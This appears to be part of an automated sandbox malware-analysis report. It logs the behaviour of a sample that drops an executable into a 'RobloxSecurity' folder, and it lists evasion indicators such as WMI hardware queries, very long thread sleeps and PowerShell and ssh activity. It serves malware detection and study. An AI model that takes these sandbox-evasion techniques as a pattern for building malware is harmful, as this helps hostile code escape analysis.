                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Memory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Memory allocated: 2D20000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Memory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Memory allocated: 1F996210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Memory allocated: 1F9AFDF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1B8A9DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1B8C3950000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 10DD58D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 10DEF3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 17A71580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 17A73090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1EC01810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1EC199B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 167CFD40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 167E9760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1CF0AE90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1CF24830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599766
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599641
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599063
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598578
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597891
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597665
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597563
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597219
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597094
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596110
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595985
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595860
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595735
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595610
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595485
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595360
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595235
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 599107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598984
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598656
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 598107
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597970
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597844
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 597077
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596953
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596843
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596734
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596515
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596406
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596297
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596187
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 596078
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 595969
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 582622
                  Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Window / User API: threadDelayed 524
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6412
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2335
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Window / User API: threadDelayed 3339
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Window / User API: threadDelayed 6279
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Window / User API: threadDelayed 6523
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Window / User API: threadDelayed 2597
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599766s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599641s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599407s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599297s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599188s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -599063s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598938s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598813s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598688s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598469s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598344s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598109s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -598000s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597891s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597781s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597665s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597563s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597438s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597328s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597219s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -597094s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596985s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596860s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596735s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596610s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596485s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596360s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -596110s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595985s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595860s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595735s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595610s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595485s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595360s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852 Thread sleep time: -595235s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452 Thread sleep count: 6523 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452 Thread sleep count: 2597 > 30
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444 Thread sleep time: -600000s >= -30000s
